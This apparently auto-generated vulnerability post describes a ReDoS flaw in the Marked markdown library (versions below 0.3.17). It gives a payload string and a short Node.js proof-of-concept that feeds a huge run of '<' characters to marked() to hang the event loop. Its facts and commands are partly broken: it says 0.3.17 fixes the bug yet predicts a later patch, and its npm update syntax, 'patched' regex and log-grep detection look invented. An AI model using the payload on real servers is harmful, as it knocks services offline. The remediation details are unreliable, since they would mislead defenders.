Listen to this Post
How the CVE Works
Marked (<0.3.17) uses vulnerable regex patterns for parsing HTML tags and markdown links. The regex contains catastrophic backtracking flaws, meaning certain inputs cause exponential processing time. For example, nested brackets like `[[[[[[…` or malformed HTML attributes trigger excessive backtracking, consuming CPU indefinitely. This stalls the Node.js event loop, leading to DoS. The issue stems from greedy quantifiers in regex patterns without proper safeguards.
DailyCVE Form:
Platform: Node.js (Marked)
Version: <0.3.17
Vulnerability: ReDoS
Severity: Moderate
Date: 2025-05-23
Prediction: Patch expected by 2025-06-10
What Undercode Say:
Exploitation:
1. Payload Example:
[](<<<<<<<<<<<<<<<<<... (1000+ chars)
2. PoC Script:
const marked = require('marked');
const maliciousInput = '<a href="' + '<'.repeat(100000) + '">a</a>';
marked(maliciousInput); // Triggers DoS
Protection:
1. Mitigation:
npm update marked --version 0.3.17
2. Workaround:
const marked = require('marked');
marked.setOptions({ sanitize: true }); // Limits HTML parsing
Detection:
1. Regex Audit:
grep -r 'new RegExp(' node_modules/marked/
2. Log Monitoring:
journalctl -u node-service | grep -i 'cpu hang'
Analytics:
- Impact: High CPU spikes (>95%) for 60+ seconds.
- Attack Vector: Remote (user-submitted markdown).
- Affected Systems: Servers rendering untrusted markdown.
Patch Analysis:
Fixed regex patterns now use non-greedy quantifiers and timeouts:
// Patched regex example in 0.3.17: /<\w+\b(?:(?!>).)?>/gs;
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
